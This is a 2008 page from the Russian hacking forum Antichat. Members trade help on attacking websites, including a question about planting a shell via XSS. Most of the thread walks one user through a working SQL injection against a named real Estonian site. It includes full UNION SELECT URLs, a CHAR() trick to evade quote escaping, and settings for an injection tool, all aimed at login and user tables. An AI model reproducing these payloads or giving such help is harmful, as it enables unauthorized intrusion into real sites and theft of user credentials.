ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #3091  
Старый 28.08.2008, 18:55
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Цитата:
Сообщение от Mixon  
Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
 

  #3092  
Старый 28.08.2008, 19:59
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию

http://forum.antichat.ru/showpost.php?p=836658&postcount=3099
отвечю сам на cвой вопрос нужно юзать select TOP X * from table
выводит X стоку из table )
всем спасибо
 

  #3093  
Старый 29.08.2008, 01:06
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903

Репутация: 238
Отправить сообщение для Mixon с помощью ICQ
По умолчанию

Цитата:
Сообщение от ChaaK  
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
Гг,ето мне уже обьяснили)) Ну хоть веселее стало те))И за школу не боись,день рождение дьявола будет уже скоро, до 1 числа есче 3 дня.... есле бы 3 месяца...
 

  #3094  
Старый 29.08.2008, 01:33
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

Всем снова здоавствуйте, такая проблема:
при запросе
_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+TABLE_NAME,2,3,4+FROM+INFORMATION_SCHEMA.TABLES+LI MIT+23,1/**/
получаем:
Цитата:
Unknown column 'cucca_logins' in 'where clause'
если попробовать проработать таблицу 'cucca_logins':

_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+COLUMN_NAME,2,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+ where+TABLE_NAME=cucca_logins+limit+23,1/**/
И опять получаем:
Цитата:
Unknown column 'cucca_logins' in 'where clause'
с cucca_users таже истории
Помогите пожалуйста, что я делаю не так?

Последний раз редактировалось zjuk@; 29.08.2008 в 01:41..
 

  #3095  
Старый 29.08.2008, 01:37
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
 

  #3096  
Старый 29.08.2008, 01:49
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

Цитата:
Сообщение от AFoST  
во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
с кавычками меня послали, LIMIT в данном случае значения не имеет, а замена /**/ на -- ни к чему не привела.
 

  #3097  
Старый 29.08.2008, 02:05
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Код:
URL=http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1{SQLINJ}
Key=Unknown column 
Search key by=Found
Close SQL=(ничего)
и все. /* тут вообще не надо и без него работает.
у меня работает и все находит.

Последний раз редактировалось Grema; 29.08.2008 в 02:21..
 

  #3098  
Старый 29.08.2008, 02:08
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Все работает. Под чаром cucca_logins , так как кавчки экранирует
Цитата:
http://www.lacucaracha.ee/index.php?mod=menyy&kat=-4+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=CHAR(99, 117,99,99,97,95,108,111,103,105,110,115)--
 

  #3099  
Старый 29.08.2008, 02:17
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

Цитата:
Сообщение от Red_Red1  
Все работает. Под чаром cucca_logins , так как кавчки экранирует
спасибо большое, оказывается в запросе очипятывался =)
Цитата:
Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
Пасибки всем
 

  #3100  
Старый 29.08.2008, 02:22
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

Цитата:
Сообщение от zjuk@  
Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
попробуй с моими настройками может прокатит, то у меня столбцы показывает. Если не получиться, говори в какой таблице столбцы надо
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ